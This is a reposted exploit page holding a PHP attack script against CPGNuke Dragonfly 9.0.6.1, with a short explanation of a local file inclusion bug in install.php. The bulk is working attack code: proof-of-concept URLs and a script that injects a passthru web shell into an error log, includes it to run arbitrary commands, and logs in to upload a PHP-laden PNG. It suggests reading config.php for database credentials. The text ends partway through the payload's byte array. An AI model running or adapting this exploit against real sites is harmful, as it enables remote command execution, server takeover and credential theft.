首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CPGNuke Dragonfly 9.0.6.1 remote commands execution through arbitrary local
来源:http://retrogod.altervista.org 作者:rgod 发布时间:2006-02-10  

<?php
# ---dragonfly9.0.6.1_incl_xpl.php 20.15 07/02/2006 #
# #
# CPGNuke Dragonfly 9.0.6.1 remote commands execution through arbitrary local #
# inclusion - (Sun-Tzu Drangonfly killing) - #
# coded by rgod #
# site: http://retrogod.altervista.org #
# #
# -> this works regardless of magic_quotes_gpc settings #
# #
# Sun-Tzu: "Thus it may be known that the leader of armies is the arbiter of #
# the people's fate, the man on whom it depends whether the nation shall be #
# in peace or in peril."

/*
a short explaination:
install.php is not deleted after dragonfly installation, you cannot use it
to modify settings but we have a local inclusion bug in it at lines 33-49:

...
if (isset($_GET['newlang'])) {
setcookie('installlang',$_GET['newlang']);
$currentlang = $_GET['newlang'];
} elseif (isset($_COOKIE['installlang'])) {
$currentlang = $_COOKIE['installlang'];
}
$instlang = array();
if (file_exists("install/language/$currentlang.php")) {
require("install/language/$currentlang.php");
} else {
require('install/language/english.php');
}
if (file_exists("language/$currentlang/main.php")) {
require("language/$currentlang/main.php");
} else {
require('language/english/main.php');
}
...

poc:
http://[target]/[path]/install.php?newlang=../../cpg_error.log%00

we are using backslashes and a null char, but this works with magic_quotes_gpc
both on and off because of dragonfly magic quotes disable code...

also you can do that through cookies...

GET /[PATH]/install.php HTTP/1.1
Cookie: installlang=../../cpg_error.log%00;
Host: [target]
Connection: Close

There are two ways to inject arbitrary code in dragonfly resources:

i) in cpg_error.log, poc:

http://[target]/[path]/error.php?<?passthru($_GET[cmd]);?>
http://[target]/[path]/install.php?cmd=ls%20-la&newlang=../../cpg_error.log%00

this works with $error_log = true in error.php (not the default)
some problems with spaces, converted as %20 so this way works with
allow_short_open_tag = On in php.ini

ii) uploading a malicious .png file in modules/coppermine/albums/userpics/
dir. We will search for a php[some hex values].tmp file, you have to supply
valid credentials with upload rights to do that...by default, any user can
upload

however you can try manually including some database file or Apache log... use
your imagination
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
ignore_user_abort(0);

echo'<html><head><title>**CPGNuke Dragonfly 9.0.6.1 remote commands execution***
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
***CPGNuke Dragonfly 9.0.6.1 remote commands execution***</p><p class="Stile6">a
script by rgod at <a href="http://retrogod.altervista.org"target="_blank">
http://retrogod.altervista.org</a></p><table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.$_SERVER[PHP_SELF].'"> <p><input
type="text" name="host"> <span class="Stile5">* target (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/cpgnuke/ or just / ) </span></p><p><input type="text" name="CMD"> <span
class="Stile5"> * specify a command ("cat config.php" to see database username &
password...)</span></p><p><input type="text" name="ULOGIN"><span class="Stile5">
a valid USER with upload rights for Coppermine (by default any...) </span></p>
<p><input type="text" name="USER_PASSWORD"><span class="Stile5"> ... and PASSWOR
D, required for STEP 3 and following... </span> </p> <p> <input type="text"
name="port"><span class="Stile5">specify a port other than 80 (default value)
</span></p><p><input type="text" name="pRoXy"><span class="Stile5">send exploit
through an HTTP proxy (ip:port)</span></p><p> <input type="submit" name="Submit"
value="go!"></p></form></td></tr></table></body></html>';

function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$dAtAi=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($dAtAi)==1) {
echo "<td>0".htmlentities($dAtAi)."</td>";
}
else {
echo "<td>".htmlentities($dAtAi)."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".htmlentities($headeri[$li])."</td>";
}
echo "</tr></table>";
}

$pRoXy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //2x speed
{
global $pRoXy, $host, $port, $pAcKeT, $HtMl, $pRoXy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($pRoXy_regex,$pRoXy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($pRoXy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$pRoXy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$HtMl= '';
socket_write($socket, $pAcKeT, strlen($pAcKeT));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$HtMl.=$out;}
echo nl2br(htmlentities($HtMl));
echo "Closing socket...";
socket_close($socket);
}
}
}

function sendpacketii($pAcKeT,$show)
{
global $pRoXy, $host, $port, $HtMl, $pRoXy_regex;
if ($pRoXy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($pRoXy_regex,$pRoXy);
if (!$c) {
echo 'Not a valid prozy...';die;
}
$parts=explode(':',$pRoXy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$pAcKeT);
if ($pRoXy=='') {
$HtMl='';
while (!feof($ock)) {
$HtMl.=fgets($ock);
}
}
else {
$HtMl='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$HtMl))) {
$HtMl.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($HtMl));
}

function refresh()
{
flush();
ob_flush();
usleep(100000);
}
$host=$_POST[host];$port=$_POST[port];
$path=$_POST[path];$CMD=$_POST[CMD];
$pRoXy=$_POST[pRoXy];$ULOGIN=$_POST[ULOGIN];
$USER_PASSWORD=$_POST[USER_PASSWORD];

if (($host<>'') and ($path<>'') and ($CMD<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
if ($pRoXy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
$CMD=urlencode($CMD);

# STEP 0 -> look for a suntzu.tmp file (checking if exploit has already succeeded...
$pAcKeT="GET ".$p."suntzu.tmp HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);
if (eregi("filename:",$HtMl)) {
echo("Exploit already launched and succeeded...Now launch desired command...");
$temp=explode("filename:",$HtMl);
$temp2=explode(".tmp",$temp[1]);
$filename=$temp2[0].".tmp";
$filepath="../../modules/coppermine/albums/userpics/".$filename.chr(0x00);
$filepath=urlencode($filepath);
$pAcKeT="GET ".$p."install.php?cmd=$CMD&newlang=$filepath HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="User-Agent: GoogleBot 1.1\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);die;
}

# STEP 1 -> try to inject a shell in cpg_error.log,
# this works with $error_log = true in error.php (not the default)
# some problems with spaces, converted as %20 so this works with allow_short_open_tag on
$SHELL="<?ob_clean();echo\"HiMaster!\";ini_set(\"max_execution_time\",0);";
$SHELL.="passthru(\$HTTP_GET_VARS[cmd]);die;?>";
$pAcKeT="GET ".$p."error.php?$SHELL HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="User-Agent: Gameboy, Powered by Nintendo\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);

# STEP 2 -> Arbitrary local inclusion... launch commands
# install.php is still present after installation, it looses its functions
# when cpgnuke is already installed but we have an inclusion bug in it
$logfile="../../cpg_error.log".chr(0x00);
$logfile=urlencode($logfile);
$pAcKeT="GET ".$p."install.php?cmd=$CMD&newlang=$logfile HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="User-Agent: GoogleBot 1.1\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);
if (!eregi("200 OK",$HtMl)) {die("Can't find install.php on target server...<br>");}
if (eregi("HiMaster!",$HtMl)) {echo "Exploit succeeded...<br>";die;}
else {echo "STEP 2 failed..., trying STEP 3...";}

#STEP 3 -> If STEP 2 failed, trying to upload a malicious .png file -> firstly login to retrieve a cookie
# and prepare an album to upload pictures in
if ($ULOGIN=="") {die("I need a valid username to launch STEP 3...");}
if ($USER_PASSWORD=="") {die("I need a valid username to launch STEP 3...");}

$COOKIE="CMSSESSID=db7ad9bfbbe33f543b52716742805ff7;";
$dAtA="------------wX253BHGef0yW2bSsgs8Po\r\n";
$dAtA.="Content-Disposition: form-data; name=\"ulogin\"\r\n\r\n";
$dAtA.=$ULOGIN."\r\n";
$dAtA.="------------wX253BHGef0yW2bSsgs8Po\r\n";
$dAtA.="Content-Disposition: form-data; name=\"user_password\"\r\n\r\n";
$dAtA.=$USER_PASSWORD."\r\n";
$dAtA.="------------wX253BHGef0yW2bSsgs8Po--\r\n";
$pAcKeT="POST ".$p."index.php?name=coppermine&file=albmgr&cat=10002 HTTP/1.1\r\n";
$pAcKeT.="User-Agent: Mag-Net\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="Accept: */*\r\n";
$pAcKeT.="Cookie: $COOKIE\r\n";
$pAcKeT.="Content-Length: ".strlen($dAtA)."\r\n";
$pAcKeT.="Content-Type: multipart/form-data; boundary=----------wX253BHGef0yW2bSsgs8Po\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
$pAcKeT.=$dAtA;
show($pAcKeT);
sendpacketii($pAcKeT);
$temp=explode("Set-Cookie: ",$HtMl);
$temp2=explode(' ',$temp[1]);
$cookie1=$temp2[0]."path=/";
$temp2=explode(' ',$temp[2]);
$cookie2=$temp2[0]."path=/";
$temp2=explode(' ',$temp[3]);
$cookie3=$temp2[0]."path=/";
$COOKIE=$cookie1.$cookie2.$cookie3;
$COOKIE=str_replace("path=/"," ",$COOKIE);
echo'<br>cookie: -> '.htmlentities($COOKIE).'<br><br>';

$dAtA="------------tZ299BnwgKutccIBEFpGvM\r\n";
$dAtA.="Content-Disposition: form-data; name=\"cat\"\r\n\r\n";
$dAtA.="0\r\n";
$dAtA.="------------tZ299BnwgKutccIBEFpGvM\r\n";
$dAtA.="Content-Disposition: form-data; name=\"mode\"\r\n\r\n";
$dAtA.="addalb\r\n";
$dAtA.="------------tZ299BnwgKutccIBEFpGvM\r\n";
$dAtA.="Content-Disposition: form-data; name=\"title\"\r\n\r\n";
$dAtA.="SUNTZU\r\n";
$dAtA.="------------tZ299BnwgKutccIBEFpGvM--\r\n";
$pAcKeT="POST ".$p."index.php?name=coppermine&file=albmgr HTTP/1.1\r\n";
$pAcKeT.="User-Agent: Suntzu preparing his shit\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="Cookie: $COOKIE\r\n";
$pAcKeT.="Content-Length: ".strlen($dAtA)."\r\n";
$pAcKeT.="Content-Type: multipart/form-data; boundary=----------tZ299BnwgKutccIBEFpGvM\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
$pAcKeT.=$dAtA;
show($pAcKeT);
sendpacketii($pAcKeT);

$pAcKeT="GET ".$p."index.php?name=coppermine&file=upload HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="User-Agent: Suntzu looking is family photos\r\n";
$pAcKeT.="Cookie: $COOKIE\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);
$temp=explode("\">* SUNTZU",$HtMl);
$temp2=explode("\"",$temp[0]);
$album=$temp2[count($temp2)-1];
echo'<br>album: -> '.htmlentities($album).'<br><br>';

# STEP 4 -> Upload shell... this requires you have upload rights and GD library installed
# on target server... obviously if Coppermine works, GD is active

#the evil .png file, huge, but it works for me...
$SHELL=chr(137).chr(80). chr(78). chr(71). chr(13). chr(10). chr(26). chr(10).
chr(0). chr(0). chr(0). chr(13). chr(73). chr(72). chr(68). chr(82).
chr(0). chr(0). chr(0). chr(100).chr(0). chr(0). chr(0). chr(100).
chr(8). chr(2). chr(0). chr(0). chr(0). chr(255).chr(128).chr(2).
chr(3). chr(0). chr(0). chr(0). chr(9). chr(112).chr(72). chr(89).
chr(115).chr(0). chr(0). chr(11). chr(19). chr(0). chr(0). chr(11).
chr(19). chr(1). chr(0). chr(154).chr(156).chr(24). chr(0). chr(0).
chr(12). chr(38). chr(73). chr(68). chr(65). chr(84). chr(120).chr(156).
chr(221).chr(93). chr(203).chr(118).chr(236).chr(54). chr(12). chr(163).
chr(206).chr(241).chr(47). chr(118).chr(215).chr(117).chr(255).chr(255).
chr(15). chr(216).chr(133).chr(45). chr(17). chr(36). chr(65). chr(73).
chr(246).chr(120).chr(114).chr(211).chr(178).chr(189).chr(25). chr(91).
chr(47). chr(75). chr(8). chr(0). chr(83). chr(206).chr(76). chr(210).
chr(254).chr(254).chr(231).chr(175).chr(214).chr(154).chr(136).chr(180).
chr(43). chr(198).chr(225).chr(121).chr(32). chr(77). chr(154).chr(196).
chr(211).chr(244).chr(159).chr(200).chr(104).chr(32). chr(98). chr(7).
chr(189).chr(82). chr(198).chr(89). chr(63). chr(190).chr(94). chr(123).
chr(123).chr(139).chr(84). chr(224).chr(67). chr(69). chr(207).chr(23).
chr(90). chr(162).chr(118).chr(6). chr(231).chr(42). chr(34). chr(122).
chr(126).chr(177).chr(175).chr(162).chr(26). chr(202).chr(84). chr(123).
chr(243).chr(179).chr(74). chr(213).chr(154).chr(156).chr(71). chr(71).
chr(235).chr(243).chr(107).chr(253).chr(127).chr(193).chr(131).chr(11).
chr(9). chr(249).chr(45). chr(96). chr(125).chr(43). chr(148).chr(30).
chr(134).chr(56). chr(2). chr(157).chr(34). chr(179).chr(174).chr(37).
chr(182).chr(8). chr(226).chr(244).chr(107).chr(117).chr(234).chr(193).
chr(18). chr(121).chr(5). chr(172).chr(122).chr(109).chr(119).chr(162).
chr(209).chr(195).chr(16). chr(43). chr(176).chr(222).chr(149).chr(161).
chr(155).chr(76). chr(163).chr(19). chr(187).chr(13). chr(214).chr(15).
chr(82). chr(241).chr(192).chr(139).chr(182).chr(75). chr(110).chr(242).
chr(123).chr(61). chr(235).chr(71). chr(67). chr(241).chr(85). chr(145).
chr(89). chr(151).chr(230).chr(194).chr(81). chr(80). chr(217).chr(176).
chr(48). chr(145).chr(255).chr(44). chr(88). chr(58). chr(57). chr(243).
chr(209).chr(174).chr(202).chr(62). chr(109).chr(46). chr(67). chr(68).
chr(197).chr(49). chr(11). chr(129).chr(154).chr(123).chr(214).chr(192).
chr(37). chr(41). chr(240).chr(13). chr(176).chr(86). chr(70). chr(53).
chr(133).chr(96). chr(121).chr(61). chr(45). chr(42). chr(211).chr(221).
chr(176).chr(147).chr(12). chr(152).chr(98). chr(216).chr(221).chr(144).
chr(225).chr(53). chr(38). chr(65). chr(201).chr(25). chr(252).chr(98).
chr(41). chr(85). chr(172).chr(90). chr(61). chr(226).chr(39). chr(96).
chr(164).chr(177).chr(72). chr(68). chr(8). chr(179).chr(68). chr(192).
chr(187).chr(64). chr(134).chr(145).chr(63). chr(255).chr(3). chr(207).
chr(82). chr(131).chr(66). chr(195).chr(165).chr(91). chr(120).chr(61).
chr(227).chr(24). chr(120).chr(180).chr(38). chr(30). chr(55). chr(113).
chr(6). chr(127).chr(53). chr(113).chr(2). chr(196).chr(176).chr(22).
chr(120).chr(250).chr(7). chr(192).chr(42). chr(20). chr(72). chr(18).
chr(41). chr(184).chr(248).chr(226).chr(170).chr(42). chr(151).chr(193).
chr(119).chr(141).chr(97). chr(15). chr(184).chr(45). chr(118).chr(253).
chr(173).chr(100).chr(232).chr(71). chr(104).chr(97). chr(68). chr(230).
chr(89). chr(97). chr(190).chr(123).chr(211).chr(230).chr(11). chr(89).
chr(15). chr(160).chr(132).chr(54). chr(139).chr(129).chr(250).chr(54).
chr(64). chr(134).chr(247).chr(30). chr(173).chr(243).chr(198).chr(25).
chr(124).chr(208).chr(219).chr(253).chr(187).chr(161).chr(248).chr(3).
chr(230).chr(89). chr(5). chr(67). chr(249).chr(74). chr(234).chr(216).
chr(91). chr(122).chr(171).chr(106).chr(148).chr(52). chr(25). chr(55).
chr(193).chr(108).chr(240).chr(96). chr(79). chr(72). chr(40). chr(102).
chr(240).chr(130).chr(64). chr(133).chr(251).chr(224).chr(84). chr(134).
chr(236).chr(226).chr(175).chr(201).chr(144).chr(174).chr(62). chr(142).
chr(195).chr(64). chr(193).chr(51). chr(117).chr(101).chr(28). chr(208).
chr(195).chr(101).chr(162).chr(1). chr(171).chr(193).chr(177).chr(134).
chr(88). chr(100).chr(94). chr(13). chr(224).chr(2). chr(86). chr(107).
chr(25). chr(190).chr(224).chr(231).chr(90). chr(172).chr(62). chr(4).
chr(43). chr(198).chr(61). chr(121).chr(147).chr(25). chr(160).chr(103).
chr(13). chr(164).chr(14). chr(205).chr(221).chr(252).chr(156).chr(73).
chr(1). chr(86). chr(168).chr(79). chr(55). chr(172).chr(151).chr(225).
chr(111).chr(218).chr(238).chr(104).chr(60). chr(66). chr(43). chr(194).
chr(254).chr(126).chr(40). chr(69). chr(240).chr(84). chr(228).chr(100).
chr(22). chr(138).chr(13). chr(9). chr(36). chr(240).chr(149).chr(24).
chr(60). chr(147).chr(100).chr(224).chr(82). chr(19). chr(130).chr(147).
chr(3). chr(235).chr(161).chr(12). chr(183).chr(119).chr(207).chr(234).
chr(152).chr(23). chr(39). chr(153).chr(6). chr(196).chr(151).chr(150).
chr(112).chr(60). chr(220).chr(72). chr(6). chr(74). chr(200).chr(21).
chr(112).chr(129).chr(17). chr(36). chr(103).chr(240).chr(189).chr(157).
chr(239).chr(80). chr(206).chr(241).chr(54). chr(88). chr(204).chr(145).
chr(230).chr(233).chr(122).chr(105).chr(237).chr(189).chr(12). chr(115).
chr(172).chr(132).chr(166).chr(194).chr(63). chr(76). chr(74). chr(45).
chr(135).chr(176).chr(14). chr(49). chr(117).chr(176).chr(171).chr(7).
chr(17). chr(62). chr(204).chr(179).chr(110).chr(7). chr(235).chr(20).
chr(213).chr(67). chr(67). chr(173).chr(161).chr(107).chr(97). chr(107).
chr(206).chr(15). chr(20). chr(197).chr(180).chr(113).chr(50). chr(203).
chr(122).chr(153).chr(14). chr(141).chr(89). chr(97). chr(50). chr(147).
chr(212).chr(193).chr(183).chr(132).chr(239).chr(80). chr(41). chr(195).
chr(107).chr(192).chr(16). chr(31). chr(57). chr(62). chr(32). chr(226).
chr(202).chr(92). chr(177).chr(54). chr(82). chr(45). chr(50). chr(182).
chr(205).chr(194).chr(16). chr(212).chr(235).chr(169).chr(195).chr(176).
chr(229).chr(22). chr(112).chr(145).chr(196).chr(44). chr(184).chr(172).
chr(65). chr(222).chr(124).chr(123).chr(236).chr(78). chr(101).chr(248).
chr(178).chr(193).chr(251).chr(206).chr(154).chr(152).chr(149).chr(160).
chr(105).chr(213).chr(153).chr(175).chr(240).chr(91). chr(160).chr(38).
chr(77). chr(228).chr(192).chr(53). chr(184).chr(44). chr(194).chr(154).
chr(2). chr(78). chr(209).chr(210).chr(3). chr(245).chr(88). chr(234).
chr(144).chr(152).chr(85). chr(47). chr(229).chr(227).chr(80). chr(239).
chr(81). chr(185).chr(190).chr(73). chr(76). chr(16). chr(232).chr(217).
chr(53). chr(103).chr(242).chr(60). chr(107).chr(172).chr(172).chr(1).
chr(38). chr(129).chr(89). chr(17). chr(154).chr(152).chr(164).chr(58).
chr(120).chr(240).chr(128).chr(232).chr(239).chr(171).chr(204).chr(74).
chr(233).chr(129).chr(175).chr(207).chr(58). chr(109).chr(41). chr(219).
chr(130).chr(51). chr(204).chr(193).chr(6). chr(179).chr(58). chr(32).
chr(45). chr(172).chr(121).chr(160).chr(97). chr(120).chr(70). chr(208).
chr(220).chr(81). chr(201).chr(44). chr(88). chr(76). chr(94). chr(222).
chr(188).chr(32). chr(198).chr(236).chr(222).chr(7). chr(88). chr(240).
chr(113).chr(154).chr(184).chr(135).chr(13). chr(50). chr(114).chr(90).
chr(47). chr(214).chr(150).chr(177).chr(107).chr(253).chr(167).chr(59).
chr(76). chr(109).chr(145).chr(47). chr(43). chr(102).chr(37). chr(69).
chr(74). chr(170).chr(220).chr(98). chr(214).chr(50). chr(102).chr(93).
chr(188).chr(174).chr(206).chr(208).chr(120).chr(226).chr(111).chr(42).
chr(158).chr(89). chr(231).chr(97). chr(67). chr(148).chr(196).chr(8).
chr(121).chr(224).chr(170).chr(91). chr(68). chr(103).chr(76). chr(161).
chr(2). chr(205).chr(230).chr(72). chr(153).chr(21). chr(23). chr(151).
chr(121).chr(116).chr(159).chr(89). chr(57). chr(124).chr(134).chr(30).
chr(7). chr(104).chr(216).chr(176).chr(65). chr(123).chr(150).chr(199).
chr(251).chr(28). chr(214).chr(235).chr(16). chr(55). chr(210).chr(0).
chr(16). chr(90). chr(22). chr(122).chr(22). chr(178).chr(194).chr(243).
chr(75). chr(18). chr(130).chr(173).chr(60). chr(67). chr(102).chr(189).
chr(18). chr(134).chr(0). chr(27). chr(18). chr(160).chr(9). chr(62).
chr(154).chr(220).chr(205).chr(223).chr(31). chr(20). chr(218).chr(156).
chr(24). chr(30). chr(136).chr(81). chr(35). chr(138).chr(28). chr(85).
chr(210).chr(177).chr(243).chr(139).chr(117).chr(103).chr(243).chr(12).
chr(254).chr(59). chr(204).chr(210).chr(26). chr(167).chr(107).chr(192).
chr(88). chr(175).chr(222).chr(145).chr(122).chr(141).chr(74). chr(115).
chr(164).chr(115).chr(140).chr(107).chr(42). chr(167).chr(193).chr(215).
chr(4). chr(1). chr(116).chr(90). chr(174).chr(117).chr(252).chr(18).
chr(113).chr(85). chr(214).chr(41). chr(249).chr(231).chr(27). chr(204).
chr(2). chr(139).chr(89). chr(36). chr(11). chr(233).chr(169).chr(132).
chr(104).chr(51). chr(120).chr(112).chr(60). chr(4). chr(65). chr(147).
chr(84). chr(155).chr(228).chr(189).chr(225).chr(121).chr(228).chr(180).
chr(41). chr(110).chr(125).chr(17). chr(32). chr(174).chr(187).chr(221).
chr(189).chr(33). chr(225).chr(26). chr(105).chr(4). chr(177).chr(226).
chr(81). chr(108).chr(237).chr(161).chr(84). chr(111).chr(106).chr(65).
chr(191).chr(40). chr(216).chr(179).chr(145).chr(130).chr(12). chr(165).
chr(146).chr(33). chr(26). chr(60). chr(232).chr(171).chr(18). chr(32).
chr(35). chr(80). chr(109).chr(87). chr(43). chr(252).chr(166).chr(49).
chr(231).chr(209).chr(8). chr(142).chr(169).chr(162).chr(234).chr(131).
chr(24). chr(45). chr(131).chr(7). chr(49). chr(218).chr(109).chr(177).
chr(203).chr(144).chr(249).chr(116).chr(198).chr(136).chr(56). chr(20).
chr(19). chr(32). chr(199).chr(83). chr(200).chr(217).chr(123).chr(6).
chr(47). chr(34). chr(49). chr(99). chr(72). chr(152).chr(2). chr(167).
chr(58). chr(72). chr(40). chr(198).chr(200).chr(56). chr(149).chr(19).
chr(188).chr(36). chr(67). chr(167).chr(177).chr(62). chr(78). chr(233).
chr(226).chr(141).chr(162).chr(194).chr(177).chr(146).chr(5). chr(92).
chr(95). chr(55). chr(120).chr(216).chr(203).chr(24). chr(80). chr(205).
chr(227).chr(170).chr(131).chr(41). chr(225).chr(190).chr(217).chr(166).
chr(50). chr(148).chr(86). chr(229).chr(71). chr(11). chr(25). chr(178).
chr(62). chr(220).chr(203).chr(202).chr(101).chr(61). chr(15). chr(42).
chr(76). chr(135).chr(160).chr(187).chr(27). chr(88). chr(41). chr(147).
chr(225).chr(5). chr(148).chr(39). chr(148).chr(136).chr(158).chr(18).
chr(197).chr(55). chr(134).chr(112).chr(185).chr(85). chr(229).chr(48).
chr(22). chr(193).chr(232).chr(183).chr(200).chr(176).chr(211).chr(68).
chr(83). chr(75). chr(42). chr(195).chr(145).chr(103).chr(104).chr(108).
chr(171).chr(138).chr(169).chr(67). chr(152).chr(63). chr(161).chr(146).
chr(176).chr(162).chr(154).chr(65). chr(177).chr(39). chr(173).chr(126).
chr(95). chr(134).chr(17). chr(53). chr(124).chr(245).chr(119).chr(67).
chr(160).chr(86). chr(11). chr(206).chr(5). chr(44). chr(235).chr(229).
chr(45). chr(166).chr(14). chr(182).chr(4). chr(2). chr(19). chr(23).
chr(163).chr(235).chr(205).chr(172).chr(234).chr(115).chr(56). chr(230).
chr(225).chr(147).chr(238).chr(148).chr(85). chr(73). chr(118).chr(174).
chr(36). chr(64). chr(185).chr(208).chr(1). chr(104).chr(228).chr(146).
chr(99). chr(255).chr(70). chr(92). chr(158).chr(37). chr(1). chr(38).
chr(155).chr(4). chr(206).chr(200).chr(159).chr(149).chr(179).chr(173).
chr(219).chr(172).chr(90). chr(220).chr(139).chr(226).chr(209).chr(3).
chr(168).chr(47). chr(26). chr(21). chr(244).chr(242).chr(144).chr(141).
chr(54). chr(165).chr(103).chr(141).chr(111).chr(193).chr(177).chr(68).
chr(138).chr(122).chr(86). chr(152).chr(91). chr(110).chr(176).chr(225).
chr(89). chr(188).chr(108).chr(1). chr(97). chr(121).chr(239).chr(123).
chr(146).chr(58). chr(176).chr(12). chr(190).chr(39). chr(13). chr(226).
chr(32). chr(59). chr(47). chr(123).chr(140).chr(25). chr(54). chr(50).
chr(89). chr(246).chr(112).chr(56). chr(76). chr(102).chr(177).chr(184).
chr(149).chr(103).chr(205).chr(123).chr(179).chr(241).chr(98). chr(151).
chr(185).chr(103).chr(133).chr(43). chr(121).chr(207).chr(138).chr(101).
chr(0). chr(89). chr(166).chr(152).chr(246).chr(164).chr(52). chr(207).
chr(61). chr(59). chr(111).chr(154).chr(237).chr(140).chr(40). chr(51).
chr(207).chr(122).chr(57). chr(156).chr(243).chr(144).chr(115).chr(108).
chr(229).chr(41). chr(195).chr(202).chr(122).chr(243).chr(134).chr(6).
chr(216).chr(191).chr(27). chr(199).chr(98). chr(129).chr(19). chr(231).
chr(34). chr(115).chr(222).chr(194).chr(232).chr(117).chr(244).chr(112).
chr(182).chr(225).chr(150).chr(143).chr(39). chr(228).chr(28). chr(202).
chr(26). chr(81). chr(31). chr(12). chr(115).chr(26). chr(60). chr(40).
chr(208).chr(247).chr(95). chr(1). chr(83). chr(156).chr(237).chr(244).
chr(216).chr(239).chr(87). chr(69). chr(249).chr(108).chr(121).chr(165).
chr(70). chr(17). chr(110).chr(240).chr(126).chr(8). chr(141).chr(71).
chr(221).chr(224).chr(233).chr(181).chr(18). chr(124).chr(149).chr(121).
chr(197).chr(210).chr(111).chr(139).chr(110).chr(51). chr(28). chr(102).
chr(5). chr(128).chr(81). chr(146).chr(218).chr(8). chr(35). chr(93).
chr(163).chr(227).chr(1). chr(77). chr(120).chr(243).chr(159).chr(201).
chr(31). chr(72). chr(138).chr(228).chr(42). chr(226).chr(192).chr(78).
chr(152).chr(76). chr(133).chr(211).chr(8). chr(29). chr(14). chr(94).
chr(159).chr(139).chr(94). chr(17). chr(210).chr(231).chr(188).chr(91).
chr(163).chr(116).chr(99). chr(164).chr(124).chr(31). chr(140).chr(27).
chr(73). chr(63). chr(56). chr(130).chr(117).chr(107).chr(41). chr(143).
chr(82). chr(135).chr(47). chr(198).chr(147).chr(212).chr(225).chr(206).
chr(224).chr(150).chr(103).chr(109).chr(207).chr(228).chr(251).chr(177).
chr(188).chr(212).chr(83). chr(38). chr(109).chr(92). chr(117).chr(53).
